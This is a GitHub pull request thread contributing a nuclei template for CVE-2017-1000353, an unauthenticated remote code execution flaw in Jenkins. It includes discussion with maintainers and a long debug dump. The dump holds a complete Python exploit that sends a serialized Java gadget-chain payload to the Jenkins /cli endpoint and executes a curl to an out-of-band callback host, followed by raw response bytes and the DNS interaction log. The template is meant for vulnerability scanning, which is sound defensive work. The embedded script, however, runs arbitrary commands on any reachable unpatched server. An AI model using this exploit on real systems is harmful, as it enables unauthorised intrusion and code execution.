Create CVE-2017-1000353.yaml

[hnd3884]

/claim #11185

Jenkins Unauthenticated Remote Code Execution

Template / PR Information

Provide full url of Jenkins like below

nuclei -u http://192.168.180.1:8000 -t nuclei.yaml

The template exploit unsafe deserialization and execute command curl https://{{interactsh-url}} so use interactsh protocol as matcher

• Added CVE-2017-1000353
• References:
  • https://github.com/vulhub/CVE-2017-1000353

Template Validation

I've validated this template locally?

• YES
• NO

Additional Details (leave it blank if not applicable)

POC

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server

[algora-pbc]

👉 To complete your submission, sign up on Algora, link your Github account and submit the data for your PR.

[GeorginaReeder]

Thanks so much for your contribution @hnd3884 ! :)

[princechaddha]

@hnd3884, thank you so much for sharing this template with the community and contributing to this project 🍻

Can you confirm if this CVE can’t be written using HTTP/TCP + helpers or the JS protocol? We avoid adding code templates for CVEs that can be achieved using HTTP, TCP, or JavaScript, as such templates are blocked by default and won’t produce results. Therefore, we prioritize creating templates with other protocols unless exceptions are made.

[hnd3884]

Dear @princechaddha,

The reason i think it could not be written using HTTP/TCP + helpers or the JS protocol is that we have to prepare serialized data with complex steps (find index, , and the serialized payload also can not be generated by builtin ysoserial tool. The exploit steps are as same as CVE-2016-9299, with different gadget chain https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2016/CVE-2016-9299.yaml . I tried both http and tcp and i'm not farmiliar with javascript

[hnd3884]

When i tried to use two tcp request, It work perfectly if i specify interact url and manually check for dns request. But when i use {{interactsh-url}} to auto detect using interact protocol, nuclei keeps return missing compiled operators for 'hex-byte-request' template

[princechaddha]

@hnd3884 Sorry for the late reply on this PR. Can you please share the network template and any errors or debug data you have. Our team can help fix it. It would also be better for everyone if the exploits use the TCP protocol to increase coverage.

[hnd3884]

Dear @princechaddha,

This is -debug result

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.5

                projectdiscovery.io

[INF] Current nuclei version: v3.3.5 (outdated)
[INF] Current nuclei-templates version: v10.1.0 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from hoangnd
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[DBG] [CVE-2017-1000353] Dumped Executed Source Code for http://192.168.180.1:8000

import requests
import uuid
import threading
import time
import os
import struct

CMD = 'curl https://' + os.getenv('OAST')
URL = '%s/cli' % os.getenv('ROOTURL').rstrip('/')
PREAMLE = b'<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
PROTO = b'\x00\x00\x00\x00'

def java_string(s):
    length = len(s)
    packed_length = struct.pack(">H", length)
    return packed_length + s.encode()

def download(url, session):
    headers = {'Side' : 'download'}
    headers['Content-type'] = 'application/x-www-form-urlencoded'
    headers['Session'] = session
    headers['Transfer-Encoding'] = 'chunked'
    r = requests.post(url, data=b' ', headers=headers,  stream=True, verify=False)
    print(r.content)

def upload(url, session, data):
    headers = {'Side' : 'upload'}
    headers['Session'] = session
    headers['Content-type'] = 'application/octet-stream'
    headers['Accept-Encoding'] = None
    r = requests.post(url,data=data,headers=headers, verify=False)

def upload_chunked(url,session):
    headers = {'Side' : 'upload'}
    headers['Session'] = session
    headers['Content-type'] = 'application/octet-stream'
    headers['Accept-Encoding']= None
    headers['Transfer-Encoding'] = 'chunked'
    headers['Cache-Control'] = 'no-cache'

    r = requests.post(url, headers=headers, data=create_payload_chunked(),  verify=False)
    print(r.content.hex())

def create_payload_chunked():
    yield PREAMLE
    yield PROTO
    yield create_payload(CMD)

def create_payload(cmd):
    serialized = "aced00057372002f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5265666572656e63654d61701594ca03984908d7030000787077110000000000000001003f40000000000010737200286a6176612e7574696c2e636f6e63757272656e742e436f70794f6e577269746541727261795365744bbdd092901569d70200014c0002616c74002b4c6a6176612f7574696c2f636f6e63757272656e742f436f70794f6e577269746541727261794c6973743b7870737200296a6176612e7574696c2e636f6e63757272656e742e436f70794f6e577269746541727261794c697374785d9fd546ab90c303000078707704000000027372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e63757272656e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870707372001a6a6176612e73656375726974792e5369676e65644f626a65637409ffbd682a3cd5ff0200035b0007636f6e74656e747400025b425b00097369676e617475726571007e000e4c000c746865616c676f726974686d7400124c6a6176612f6c616e672f537472696e673b7870757200025b42acf317f8060854e002000078700000050baced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000001740012746f756368202f746d702f686f616e676e64740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878787571007e00110000002f302d021439e722dbd82414a747c2de0e7d831a1264e0ab5902150084604637b41649a8ba9799fe2cc0590574cf970e740003445341737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017078737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced530200014c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b0300007870737200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c656d656e747371007e0018787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000017704000000017400046173646678787371007e001e00000000770400000000787871007e00207371007e00027371007e000577040000000271007e001a71007e00097871007e00207078".replace("0012746f756368202f746d702f686f616e676e64",java_string(cmd).hex()).replace('050baced000573', struct.pack(">H", 1291 + len(cmd)-18).hex()  + 'aced000573')
    return bytes.fromhex(serialized)

def main():
    session = str(uuid.uuid4())
    t = threading.Thread(target=download, args=(URL, session))
    t.start()
    time.sleep(2)
    upload_chunked(URL, session)

main()

[DBG] [CVE-2017-1000353] Dumped Code Execution for http://192.168.180.1:8000

b'Starting HTTP duplex channel<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\x00\x00\x00\x00\xac\xed\x00\x05sr\x00\x1bhudson.remoting.UserRequest\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03L\x00\x10classLoaderProxyt\x000Lhudson/remoting/RemoteClassLoader$IClassLoader;[\x00\x07requestt\x00\x02[BL\x00\x08toStringt\x00\x12Ljava/lang/String;xr\x00\x17hudson.remoting.Request\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03I\x00\x02idI\x00\x08lastIoIdL\x00\x08responset\x00\x1aLhudson/remoting/Response;xr\x00\x17hudson.remoting.Command\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01L\x00\tcreatedAtt\x00\x15Ljava/lang/Exception;xpsr\x00\x1ehudson.remoting.Command$Source\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01L\x00\x06this$0t\x00\x19Lhudson/remoting/Command;xr\x00\x13java.lang.Exception\xd0\xfd\x1f>\x1a;\x1c\xc4\x02\x00\x00xr\x00\x13java.lang.Throwable\xd5\xc65\'9w\xb8\xcb\x03\x00\x04L\x00\x05causet\x00\x15Ljava/lang/Throwable;L\x00\rdetailMessageq\x00~\x00\x03[\x00\nstackTracet\x00\x1e[Ljava/lang/StackTraceElement;L\x00\x14suppressedExceptionst\x00\x10Ljava/util/List;xpq\x00~\x00\x10pur\x00\x1e[Ljava.lang.StackTraceElement;\x02F*<<\xfd"9\x02\x00\x00xp\x00\x00\x00\x07sr\x00\x1bjava.lang.StackTraceElementa\t\xc5\x9a&6\xdd\x85\x02\x00\x04I\x00\nlineNumberL\x00\x0edeclaringClassq\x00~\x00\x03L\x00\x08fileNameq\x00~\x00\x03L\x00\nmethodNameq\x00~\x00\x03xp\x00\x00\x00Gt\x00\x17hudson.remoting.Commandt\x00\x0cCommand.javat\x00\x06<init>sq\x00~\x00\x13\x00\x00\x006q\x00~\x00\x15q\x00~\x00\x16q\x00~\x00\x17sq\x00~\x00\x13\x00\x00\x00ct\x00\x17hudson.remoting.Requestt\x00\x0cRequest.javaq\x00~\x00\x17sq\x00~\x00\x13\x00\x00\x00=t\x00\x1bhudson.remoting.UserRequestt\x00\x10UserRequest.javaq\x00~\x00\x17sq\x00~\x00\x13\x00\x00\x03Xt\x00\x17hudson.remoting.Channelt\x00\x0cChannel.javat\x00\tcallAsyncsq\x00~\x00\x13\x00\x00\x00jt\x00\x1ahudson.remoting.PingThreadt\x00\x0fPingThread.javat\x00\x04pingsq\x00~\x00\x13\x00\x00\x00Vq\x00~\x00$q\x00~\x00%t\x00\x03runsr\x00&java.util.Collections$UnmodifiableList\xfc\x0f%1\xb5\xec\x8e\x10\x02\x00\x01L\x00\x04listq\x00~\x00\x0fxr\x00,java.util.Collections$UnmodifiableCollection\x19B\x00\x80\xcb^\xf7\x1e\x02\x00\x01L\x00\x01ct\x00\x16Ljava/util/Collection;xpsr\x00\x13java.util.ArrayListx\x81\xd2\x1d\x99\xc7a\x9d\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x00w\x04\x00\x00\x00\x00xq\x00~\x00.xq\x00~\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00ps}\x00\x00\x00\x02\x00.hudson.remoting.RemoteClassLoader$IClassLoader\x00\x1chudson.remoting.IReadResolvexr\x00\x17java.lang.reflect.Proxy\xe1\'\xda \xcc\x10C\xcb\x02\x00\x01L\x00\x01ht\x00%Ljava/lang/reflect/InvocationHandler;xpsr\x00\'hudson.remoting.RemoteInvocationHandler\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x05Z\x00\x14autoUnexportByCallerZ\x00\tgoingHomeI\x00\x03oidZ\x00\tuserProxyL\x00\x06originq\x00~\x00\rxp\x00\x00\x00\x00\x00\x02\x00sq\x00~\x00\x0bq\x00~\x005t\x00xProxy hudson.remoting.RemoteInvocationHandler@2 was created for interface hudson.remoting.RemoteClassLoader$IClassLoaderuq\x00~\x00\x11\x00\x00\x00\x08sq\x00~\x00\x13\x00\x00\x00~t\x00\'hudson.remoting.RemoteInvocationHandlert\x00\x1cRemoteInvocationHandler.javaq\x00~\x00\x17sq\x00~\x00\x13\x00\x00\x00\x8bq\x00~\x009q\x00~\x00:t\x00\x04wrapsq\x00~\x00\x13\x00\x00\x02\x8fq\x00~\x00 q\x00~\x00!t\x00\x06exportsq\x00~\x00\x13\x00\x00\x02\xd4t\x00!hudson.remoting.RemoteClassLoadert\x00\x16RemoteClassLoader.javaq\x00~\x00>sq\x00~\x00\x13\x00\x00\x00Gq\x00~\x00\x1dq\x00~\x00\x1eq\x00~\x00\x17sq\x00~\x00\x13\x00\x00\x03Xq\x00~\x00 q\x00~\x00!q\x00~\x00"sq\x00~\x00\x13\x00\x00\x00jq\x00~\x00$q\x00~\x00%q\x00~\x00&sq\x00~\x00\x13\x00\x00\x00Vq\x00~\x00$q\x00~\x00%q\x00~\x00(q\x00~\x00,xxur\x00\x02[B\xac\xf3\x17\xf8\x06\x08T\xe0\x02\x00\x00xp\x00\x00\x00>\xac\xed\x00\x05sr\x00\x1fhudson.remoting.PingThread$Ping\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00w\x08\xff\xff\xff\xfe\x00\x00\x00\x02xpt\x00(hudson.remoting.PingThread$Ping@10dfdc07y'

[CTBFR0VF3mbsQ6LtFJS0jX1wM9beb8crJ] Received DNS interaction from 172.253.5.27 at 2024-12-09 14:24:09
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 58788
;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;CTBFR0VF3mbsQ6LtFJS0jX1wM9beb8crJ.oASt.live.   IN       A



------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 58788
;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;CTBFR0VF3mbsQ6LtFJS0jX1wM9beb8crJ.oASt.live.   IN       A

;; ANSWER SECTION:
CTBFR0VF3mbsQ6LtFJS0jX1wM9beb8crJ.oASt.live.    3600    IN      A       178.128.210.172

;; AUTHORITY SECTION:
CTBFR0VF3mbsQ6LtFJS0jX1wM9beb8crJ.oASt.live.    3600    IN      NS      ns1.oast.live.
CTBFR0VF3mbsQ6LtFJS0jX1wM9beb8crJ.oASt.live.    3600    IN      NS      ns2.oast.live.

;; ADDITIONAL SECTION:
ns1.oast.live.  3600    IN      A       178.128.210.172
ns2.oast.live.  3600    IN      A       178.128.210.172


[CVE-2017-1000353:dsl-1] [code] [critical] http://192.168.180.1:8000